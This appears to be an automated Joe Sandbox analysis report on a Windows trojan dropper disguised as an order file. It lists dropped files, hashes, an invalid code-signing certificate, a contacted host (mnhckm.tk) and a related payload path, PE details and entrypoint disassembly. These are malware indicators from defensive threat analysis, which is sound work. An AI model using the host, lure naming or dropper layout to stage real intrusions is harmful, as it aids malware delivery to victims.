C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Sigtelinjens\Tvtningerne\Holograph\Towy\Dgnrytmers\GPUPowerSavingConfigEditor.dll	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://subca.ocsp-certum.com05	0%	Avira URL Cloud	safe
http://subca.ocsp-certum.com02	0%	Avira URL Cloud	safe
http://subca.ocsp-certum.com01	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
mnhckm.tk	45.8.132.92	true	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://crl.certum.pl/ctnca2.crl0l	Order_002376662-579588_Date 24082022.exe	false		high
http://repository.certum.pl/ctnca2.cer09	Order_002376662-579588_Date 24082022.exe	false		high
http://crl.certum.pl/ctsca2021.crl0o	Order_002376662-579588_Date 24082022.exe	false		high
http://nsis.sf.net/NSIS_Error	Order_002376662-579588_Date 24082022.exe	false		high
http://repository.certum.pl/ctnca.cer09	Order_002376662-579588_Date 24082022.exe	false		high
http://nsis.sf.net/NSIS_ErrorError	Order_002376662-579588_Date 24082022.exe	false		high
http://repository.certum.pl/ctsca2021.cer0	Order_002376662-579588_Date 24082022.exe	false		high
http://crl.certum.pl/ctnca.crl0k	Order_002376662-579588_Date 24082022.exe	false		high
http://subca.ocsp-certum.com05	Order_002376662-579588_Date 24082022.exe	false	Avira URL Cloud: safe	unknown
http://www.certum.pl/CPS0	Order_002376662-579588_Date 24082022.exe	false		high
http://subca.ocsp-certum.com02	Order_002376662-579588_Date 24082022.exe	false	Avira URL Cloud: safe	unknown
http://subca.ocsp-certum.com01	Order_002376662-579588_Date 24082022.exe	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
45.8.132.92	mnhckm.tk	Germany		61317	ASDETUKhttpwwwheficedcomGB	false

General Information

Joe Sandbox Version:	35.0.0 Citrine
Analysis ID:	694559
Start date and time:	2022-08-31 23:59:12 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 13m 32s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Order_002376662-579588_Date 24082022.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected Instruction Hammering
Number of analysed new started processes analysed:	24
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal80.troj.evad.winEXE@4/7@1/1
EGA Information:	Successful, ratio: 50%
HDC Information:	Successful, ratio: 24.4% (good quality ratio 24.1%) Quality average: 88.7% Quality standard deviation: 20.8%
HCA Information:	Successful, ratio: 92% Number of executed functions: 68 Number of non-executed functions: 181
Cookbook Comments:	Found application associated with file extension: .exe Adjust boot time Enable AMSI

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, backgroundTaskHost.exe, svchost.exe
Excluded domains from analysis (whitelisted): spclient.wg.spotify.com, wdcpalt.microsoft.com, client.wns.windows.com, ctldl.windowsupdate.com, wdcp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
Execution Graph export aborted for target CasPol.exe, PID 3112 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
45.8.132.92	TT COPY_August 24 2022#124612011.exe	Get hash	malicious	Browse	mnhckm.tk/RmJPRzwr25.afm

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
mnhckm.tk	TT COPY_August 24 2022#124612011.exe	Get hash	malicious	Browse	45.8.132.92

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ASDETUKhttpwwwheficedcomGB	MV WAN LI.exe	Get hash	malicious	Browse	181.214.31.161
	MV WAN LI.exe	Get hash	malicious	Browse	181.214.31.161
	D0scYV1CAq.elf	Get hash	malicious	Browse	179.61.157.211
	U22AGYcTXc.elf	Get hash	malicious	Browse	134.202.154.167
	Q88 mv Rusich-8 .exe	Get hash	malicious	Browse	181.214.31.161
	SecuriteInfo.com.W32.AIDetectNet.01.19315.6190.exe	Get hash	malicious	Browse	181.214.31.161
	z4x3Y6wrRZ.elf	Get hash	malicious	Browse	191.104.133.52
	nl656Q3bfq	Get hash	malicious	Browse	191.108.52.5
	BSL & VLS PARTICULARS.exe	Get hash	malicious	Browse	181.214.31.161
	IEEi5d6RYU	Get hash	malicious	Browse	89.19.50.209
	pVMdAcoocT.exe	Get hash	malicious	Browse	181.214.48.40
	TT COPY_August 24 2022#124612011.exe	Get hash	malicious	Browse	45.8.132.92
	YSUK7c17l7	Get hash	malicious	Browse	5.180.81.253
	skid.x86_64-20220819-1656	Get hash	malicious	Browse	191.104.133.21
	MYiDFJwhKP	Get hash	malicious	Browse	89.207.176.221
	4fkCS2In3P.exe	Get hash	malicious	Browse	141.98.90.28
	WK7EcAR6vU.exe	Get hash	malicious	Browse	141.98.90.28
	1lTjISChUv.exe	Get hash	malicious	Browse	141.98.90.28
	uo78RWghZ7.exe	Get hash	malicious	Browse	141.98.90.28
	mV4ZJ04xUE.exe	Get hash	malicious	Browse	141.98.90.28

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Sigtelinjens\Tvtningerne\Holograph\Towy\Dgnrytmers\GPUPowerSavingConfigEditor.dll	Order_002376662-579588_Date 24082022.exe	Get hash	malicious	Browse
	TT COPY_August 24 2022#124612011.exe	Get hash	malicious	Browse
	RFQ 1021-3008-22 xls.exe	Get hash	malicious	Browse
	RFQ 1021-3008-22 xls.exe	Get hash	malicious	Browse
	Quotation_No 200000002504.exe	Get hash	malicious	Browse
	Quotation_No 200000002504.exe	Get hash	malicious	Browse
	07.06.2022 - UAB TG Air Waybill Number 2901365211- EC650SX3-36AT - 1.05kg.docx.exe	Get hash	malicious	Browse
	07.06.2022 - UAB TG Air Waybill Number 2901365211- EC650SX3-36AT - 1.05kg.docx.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp\System.dll	Order_002376662-579588_Date 24082022.exe	Get hash	malicious	Browse
	TT COPY_August 24 2022#124612011.exe	Get hash	malicious	Browse
	RFQ 1021-3008-22 xls.exe	Get hash	malicious	Browse
	RFQ 1021-3008-22 xls.exe	Get hash	malicious	Browse
	teddytanya.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp\System.dll

Download File

Process:	C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	11264
Entropy (8bit):	5.767999234165119
Encrypted:	false
SSDEEP:	192:cPtkumJX7zBE2kGwfy9S9VkPsFQ1MZ1c:N7O2k5q9wA1MZa
MD5:	C9473CB90D79A374B2BA6040CA16E45C
SHA1:	AB95B54F12796DCE57210D65F05124A6ED81234A
SHA-256:	B80A5CBA69D1853ED5979B0CA0352437BF368A5CFB86CB4528EDADD410E11352
SHA-512:	EAFE7D5894622BC21F663BCA4DD594392EE0F5B29270B6B56B0187093D6A3A103545464FF6398AD32D2CF15DAB79B1F133218BA9BA337DDC01330B5ADA804D7B
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Order_002376662-579588_Date 24082022.exe, Detection: malicious, Browse Filename: TT COPY_August 24 2022#124612011.exe, Detection: malicious, Browse Filename: RFQ 1021-3008-22 xls.exe, Detection: malicious, Browse Filename: RFQ 1021-3008-22 xls.exe, Detection: malicious, Browse Filename: teddytanya.exe, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)...m.m.m...k.m.~....j.9..i....l....l.Richm.........................PE..L.....uY...........!.................'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text...O........................... ..`.rdata..S....0......."..............@..@.data...h....@.......&..............@....reloc..^....P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Sigtelinjens\Tvtningerne\Forhaanet.Nab

Download File

Process:	C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	29564
Entropy (8bit):	3.9994965063204706
Encrypted:	false
SSDEEP:	768:K3xU0sST74YF3ZeaYDqKjmgtajzKmFGMiElvFoe2:2Tsusm3ODqK/Imlh
MD5:	61F8A1615921DA63C2609B90984F1D32
SHA1:	D188A91A6745481BB830704854FE61E2A41E0B9A
SHA-256:	DF023F32CE51FF8BA14F1147B1D7644D734AC9EF0FB5CF024A88A495E153EFF0
SHA-512:	9855CCCA3CF01993F04ECC48824FF8AD7084176F8A9411CF8E737FDAB5BB093B3FE19B8098D8206A1DFF546DA59D227D783470A2D1DCE1083C1FBC9661FBB3DC
Malicious:	false
Reputation:	low
Preview:	79F5033C9D5E8CB0E34E74DBA3F160A8A116FFBE99FFC4E7AB4189ABA94B8F01DD34E5CC3D75871F5B27143BFD1FAEF87C50308056EFCBC142ABE1F8C638BE972D7DE340583A9C76BD7ED307EFB159E8EE7844BBA73F5DD7B1DF60CD378221F6BCB008205C718C5C3D2C9978871B0F9B8B02370F79F12DAB84A9C7D793A5181FC249ED6136A6EF71E962E295EF440D9D4B0017F75253D1433B5E2E2BE721069D97AE1E0B31F4FC9F0CD109B46C79BA1D3F88D3DF73715581039E00D83F9F0EC2B48A52CBC4A37AD6779E4997433AB97D75FF78AE1C1AA7755E884D821FD65138A7930C0213E6FE7694ABAF56071B3AF05D5FBC7401A6D776E5FD88DA61BCC05675FF42FCC1CBBE2894A439183B853B6C170C338105B38468CFF07EFEED9A85C335E2F04F08F2DC0F9C3243C5319F3E4256A41FCB22BE16E71B4354F38E090AE14F8E7852031272A2063B58E48D78244C510AE6EE9C5387CFC359D0EE90882CDB81704DD368E0E963E9E0F81DFF503D71BC346492203B0E95A7E6AF23DE1289F222F7DA779BD9B0921560969C5F3FA94C0B3E7C9E627C5ABA4EEEC74E5259BBB5F80C1393C789B98CC7FEE06CB3AC2839022F745C4B8F402C5C24781278401E69ED99F56F08FD67C73117A09362CDAB03ED93295816298F51FBA17DEC31054D3E4A8ACB306B2682E11BDB133A1C1E14017EC7D3BB

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Sigtelinjens\Tvtningerne\Holograph\Towy\Dgnrytmers\GPUPowerSavingConfigEditor.dll

Download File

Process:	C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe
File Type:	PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	31456
Entropy (8bit):	6.0996914820635295
Encrypted:	false
SSDEEP:	384:sQ1QmY/8eFuAYNAx4klQvhI0tUA9wZmjML9S/3oche5ZP2TFn0E0C04Haqk6Olkm:s0YvT4ZbzRj1foHGpzkkF2X9Dh/
MD5:	6213DFF7A0CE2E52FD61EC4097DF93E7
SHA1:	4087C8D803EE9E4298AA51EC05E18D020A0A2728
SHA-256:	D12DC4BBDACDE8FC92DCFB384807D793C67B9B7E88D52EE0240E8A1901B80071
SHA-512:	85446886691BE56B027519EB2C823399031CE549AA3BF8155A0E3897AAC04E4E8D960716E40E124E0E4980027CB3EB13241A9CF32D9227470F8E0EA45FFBC79D
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Order_002376662-579588_Date 24082022.exe, Detection: malicious, Browse Filename: TT COPY_August 24 2022#124612011.exe, Detection: malicious, Browse Filename: RFQ 1021-3008-22 xls.exe, Detection: malicious, Browse Filename: RFQ 1021-3008-22 xls.exe, Detection: malicious, Browse Filename: Quotation_No 200000002504.exe, Detection: malicious, Browse Filename: Quotation_No 200000002504.exe, Detection: malicious, Browse Filename: 07.06.2022 - UAB TG Air Waybill Number 2901365211- EC650SX3-36AT - 1.05kg.docx.exe, Detection: malicious, Browse Filename: 07.06.2022 - UAB TG Air Waybill Number 2901365211- EC650SX3-36AT - 1.05kg.docx.exe, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d..._p.a.........." ..0..T............... ........... ...............................&....`...@......@............... ..................................`............\...............q............................................................... ..H............text....S... ...T.................. ..`.rsrc...`............V..............@..@........................................H.......x?...0..........Hp................................................(.....~....-.r...p.....(....o....s.........~.....~...........V(....re..p~....o....V(....rs..p~....o....V(....r...p~....o....V(....r...p~....o.....~......(....Vs....(....t..........0...........{....o.....{.....3......{.....(....&(.....o .....5...o!...r...p....+A.......~"...(#...,....($....+..r...po%...-..{.....o&...r...p...X....i2...&...{........................0...........{....o.....{.....3.......{.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Sigtelinjens\Tvtningerne\Holograph\Towy\Dgnrytmers\face-cool.png

Download File

Process:	C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	845
Entropy (8bit):	7.722985666159481
Encrypted:	false
SSDEEP:	24:47y7zZd6D14lz6mML1mc2TvTl4P5VwbxjoUWBx9:57mD14lz61gTv+P5Vwtj0
MD5:	EFB6B9E41A0DAAB0088A365317A4F635
SHA1:	5D5B2C92BB5870B15BFB383A4C749EE1B71E21AB
SHA-256:	40A5B74A33F7372AC62EC82CA65097B2BF411E6CAF2667C87DA374A06834AD05
SHA-512:	98BACE38224A53CCDA2039CD6089F704762A5D09D67CE924486800205596671A0BFC9A2BE26D36F77BAB7ECAF57E82C3D16739DBDA9FC1027A8E2B784D784C14
Malicious:	false
Preview:	.PNG........IHDR................a....IDATx.u..x.[..g]....m.f...m...=..y3...}......V)..&.v.S.}.KYr..<......n.%......q..n.Q.W.j....2....(...N5.....1{......&r/.......dE.1Tg^.!..T..F.C.:T.Ed..<.>.<.r..\.=..OIR.7Q..Ge.\|P..`0....X........>.m.E.p....>...>..M.~...........H4k.7.Z=.d....D.S3..].....f........E.....G.R.....'ND.}.eK...E.....V........ ...........p.g..)&0$...N%dc..n.x:.i..C:...l.Vg^_...r._..9..(....G...$M.....}...u-........}..o..Y.vLA........-Z.K;<.....)...GW.ph..E..c]+.....c.p..#.p[...Q....G.#.....G.......Vu...q....).yl.2.....v.\.0Mz.P/.;B....F..........{.!..T..G.}.._....".2w.m../l.JHs.x..h.....t.....a!.M.....qk. ....IX/@...w.\...2U.....u^.&N3.G..t.......8...Z6].6~..`...+......&.5&.*....ZO...$..Y..%...XF...^s[4...&.nw....?-./..T&.IS.H&.cX"...7..$c........T.9....IEND.B`.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Sigtelinjens\Tvtningerne\Kalligraferendes\Quantisers\Aqua_20.bmp

Download File

Process:	C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 100x100, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=3], baseline, precision 8, 110x110, frames 3
Category:	dropped
Size (bytes):	8419
Entropy (8bit):	7.8975477212121925
Encrypted:	false
SSDEEP:	192:oXRnOJl+MmnEjHXjbDkd914gmMJrq03QVWpen7d:KRHMmn2XjXQ1VqaQVWs7d
MD5:	EF9954E2C8A46E6F0BB6AAF1E0A7F499
SHA1:	F1639B6632F6B4B472A4A0AD653B82A48B008F6B
SHA-256:	6550954EBF87A006EDA7C80EA5EB26CD51753540C159DEA36E506C811D5261DD
SHA-512:	F00EAD97959335F95B4846A7DA20A51C2B31E255F2C013DB69CF6F595E3C0BCE299C640001E2B265864528B576F161C9105AC237F09A906E74B9AF406D211D6D
Malicious:	false
Preview:	......JFIF.....d.d.....:Exif..MM.......Q...........Q..........aQ..........a.......C....................................................................C.......................................................................n.n.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(..'...no./.....j..Z?...7..c....Z.....K.+.d....3....I.#..m@X\|S...T.....g.]..eo...#XI...\|D6......D......T.....da<..i5..!.M...I.mC.W.<O.x._...x.......Q..3..<.....4..."...@..p..y..SX.L...v..[....].+_m.k.Y..b.*X.v:..z....A.A.....>......f?..GG....s."..^......=:e@.X.{.- T.........).....g...O......_[.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Sigtelinjens\Tvtningerne\Noneffervescently.Cre

Download File

Process:	C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe
File Type:	data
Category:	dropped
Size (bytes):	105498
Entropy (8bit):	6.8469376549161245
Encrypted:	false
SSDEEP:	1536:cYUYKcQR5Y+GAjmU8R20KnRFr/ASso1gQa0CozxqDkHHB+Q/vGmHi:cYvuY+1J8R2bFbAYGQa09zxqDk++GmHi
MD5:	34957562BCFF2DAE97F8009F22642EA5
SHA1:	F22431D76E12B5E4AC240E96F6856165C70A01EE
SHA-256:	69823BE330A7C9B93750E25AFB3BC29DC33F7DE4CA7935D787BE29DD80E711D1
SHA-512:	015BE4CE81774A334761017AA7C0E397B2DE9F91904D87CDBA163CBD4C584FCBFF25A6C787595F31ABD0C24970101671C9444139088161F7C3A4E5B1634808A4
Malicious:	false
Preview:	2.1.].F..Q....H........[.Geo.A,S........n...+.\|.......]..r.uh.%.Zng.#.;...2.a.>.....b@....f.m..........@u}.e.-..9...\P.2.(.!.z...#@..u.,.k..A9..q)}.....T...D.{.)f@z.,.....[{o.....)..S.p.&.....#SEu.L..F...mc}.......<..}lV.y.:.Z..N...8.........>.W..O...c9Q1@.~./.....6...... [8-..8EB...C.....X"x..`2[.f..P1..c.?.#.{..EvD....<6.D.,..1;p.b.....W#.4....N.G.).u.u...[JL.i.D.......@...W}).".3m...%.<..[....3.3...-7.z...{..$.lI......7~...lV.....................)y.......S......@:.%2;]u.D..z.3..wv..6[......!..O..zEeT...:.8.../..C.P....H...).&n7-.t.......S...=.8].+..OsD.......v(...K..Ea5.+b.'...?..?.<....'..o.3.`.Zx......3.<..7...~......6.. >z..Z....d.6<..4).+.<...y..A...5.._..M!.$l]9.y.:...7Z.dD....}...C.M!1.Zt.1....0.)q........=..HR....4..Z.&..s.W......q..pRc.Q{........S.X.......@......+..OA.....oyw...b...G..d.\|..b.)............. ..]YE.$.......$7U..7..P.Zh.2e.f...g...(..u...i..KB.....j.. <Lts..)1...O^.X]\|[s...!........._5..$..-t.`#...T

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Sigtelinjens\Tvtningerne\Tilegnelserne\Suppegrydernes79\iso_3166-1.json

Download File

Process:	C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe
File Type:	UTF-8 Unicode text
Category:	dropped
Size (bytes):	36718
Entropy (8bit):	4.260373998588477
Encrypted:	false
SSDEEP:	192:OU+NvXvwEXFo+Hco8/+8IXAMaM2LkAAVemLK9f8QayVEJUfYZqAmULr:OU+Eo8ZLMaMWlAVemOZwyyOwMAmUX
MD5:	062FC6431BF0FF5F8E7E62587FCBD686
SHA1:	06E2BF1BB06CE408EC2AAE8D9F7A8ABC0371B57D
SHA-256:	78FB090F4A54C8B5970EC04C7511F17EB767275A8D5358604A1E335440678617
SHA-512:	8EC9F46A24C2A0B0C54463EF23D14563DDA2F7D65D8B231B994C8DDA2D5212B4DC697C6DF67B477DD245A2A065023383576A6DB48A335FAB9AFB6AAE7F764194
Malicious:	false
Preview:	{. "3166-1": [. {. "alpha_2": "AW",. "alpha_3": "ABW",. "name": "Aruba",. "numeric": "533". },. {. "alpha_2": "AF",. "alpha_3": "AFG",. "name": "Afghanistan",. "numeric": "004",. "official_name": "Islamic Republic of Afghanistan". },. {. "alpha_2": "AO",. "alpha_3": "AGO",. "name": "Angola",. "numeric": "024",. "official_name": "Republic of Angola". },. {. "alpha_2": "AI",. "alpha_3": "AIA",. "name": "Anguilla",. "numeric": "660". },. {. "alpha_2": "AX",. "alpha_3": "ALA",. "name": ".land Islands",. "numeric": "248". },. {. "alpha_2": "AL",. "alpha_3": "ALB",. "name": "Albania",. "numeric": "008",. "official_name": "Republic of Albania". },. {. "alpha_2": "AD",. "alpha_3": "AND",. "name": "Andorra",. "numeric": "020",. "official_name": "Principality of Andorra". },. {. "alpha_2

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.509543109745029
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Order_002376662-579588_Date 24082022.exe
File size:	195584
MD5:	8c2a59bd88b7e2c26045a604ed544288
SHA1:	7efb014d57608ff6a2805baf4dd7c150792e6eb4
SHA256:	0d4b100e641aad426a916cb326d20f8fe44e32ca38f7a85c505135036c6b44af
SHA512:	ca6d126b62418c1c9fe6b6c0b0418a7253b6200a179af844bd80f67c055375c51d9b268242ea9ff3e15b0c3d867d84c19508229580605cbaac8460fa9a9bec17
SSDEEP:	3072:RNzPHk9MpcDj6OzDjWubsfxAjaWde+mzaOyrxmIW//z7GfvGxkTjk3kfSD:RhRupsfKW7+me6//z7GvQ
TLSH:	7014F11D2507C7BECA53423049BA6A675EF6BA04FC8156436F637A983CD3170822F5BE
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F......F...G.v.F......F...v...F...@...F.Rich..F.........................PE..L...*.uY.................b.........

File Icon


Icon Hash:	90b270f0e260b050

Static PE Info

General

Entrypoint:	0x40330d
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x5975952A [Mon Jul 24 06:35:22 2017 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	57e98d9a5a72c8d7ad8fb7a6a58b3daf

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN="Fights Fratrkning Unnervingly ", OU="nerver Whitebait ", E=Nekrofili@Umiaq.An, O=Stagy, L=Kendallville, S=Indiana, C=US
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	20/02/2022 13:26:15 19/02/2025 13:26:15
Subject Chain	CN="Fights Fratrkning Unnervingly ", OU="nerver Whitebait ", E=Nekrofili@Umiaq.An, O=Stagy, L=Kendallville, S=Indiana, C=US
Version:	3
Thumbprint MD5:	8BFEA38B193C49A0622C53FBF7CAADE9
Thumbprint SHA-1:	CA863CD76251E5155366225CECEF5915CDC6B279
Thumbprint SHA-256:	A8B4C4809B973CA3D72051C56C958A1F73702992E831E3DED8796A5C96627D06
Serial:	2F3B028675A5223C

Entrypoint Preview

Instruction
sub esp, 00000184h
push ebx
push esi
push edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 0040A130h
mov dword ptr [esp+20h], ebx
mov byte ptr [esp+14h], 00000020h
call dword ptr [004080A8h]
call dword ptr [004080A4h]
and eax, BFFFFFFFh
cmp ax, 00000006h
mov dword ptr [0042472Ch], eax
je 00007FCB6CAB7F03h
push ebx
call 00007FCB6CABAFD2h
cmp eax, ebx
je 00007FCB6CAB7EF9h
push 00000C00h
call eax
mov esi, 00408298h
push esi
call 00007FCB6CABAF4Eh
push esi
call dword ptr [004080A0h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], bl
jne 00007FCB6CAB7EDDh
push 0000000Ah
call 00007FCB6CABAFA6h
push 00000008h
call 00007FCB6CABAF9Fh
push 00000006h
mov dword ptr [00424724h], eax
call 00007FCB6CABAF93h
cmp eax, ebx
je 00007FCB6CAB7F01h
push 0000001Eh
call eax
test eax, eax
je 00007FCB6CAB7EF9h
or byte ptr [0042472Fh], 00000040h
push ebp
call dword ptr [00408044h]
push ebx
call dword ptr [00408288h]
mov dword ptr [004247F8h], eax
push ebx
lea eax, dword ptr [esp+38h]
push 00000160h
push eax
push ebx
push 0041FCF0h
call dword ptr [00408178h]
push 0040A1ECh

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8428	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x3c000	0x74d0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x2d5a0	0x2660	.ndata
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x298	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x603c	0x6200	False	0.6572464923469388	data	6.39361655287636	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x1248	0x1400	False	0.4287109375	data	5.044261339836676	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x1a838	0x400	False	0.6455078125	data	5.223134318413766	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x25000	0x17000	0x0	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x3c000	0x74d0	0x7600	False	0.4656382415254237	data	4.073204340591157	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x3c358	0x25a8	data	English	United States
RT_ICON	0x3e900	0x10a8	data	English	United States
RT_ICON	0x3f9a8	0xea8	data	English	United States
RT_ICON	0x40850	0x988	data	English	United States
RT_ICON	0x411d8	0x8a8	data	English	United States
RT_ICON	0x41a80	0x6c8	data	English	United States
RT_ICON	0x42148	0x568	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0x426b0	0x468	GLS_BINARY_LSB_FIRST	English	United States
RT_DIALOG	0x42b18	0x100	data	English	United States
RT_DIALOG	0x42c18	0x11c	data	English	United States
RT_DIALOG	0x42d38	0xc4	data	English	United States
RT_DIALOG	0x42e00	0x60	data	English	United States
RT_GROUP_ICON	0x42e60	0x76	data	English	United States
RT_VERSION	0x42ed8	0x2b4	data	English	United States
RT_MANIFEST	0x43190	0x33e	XML 1.0 document, ASCII text, with very long lines, with no line terminators	English	United States

Imports

DLL	Import
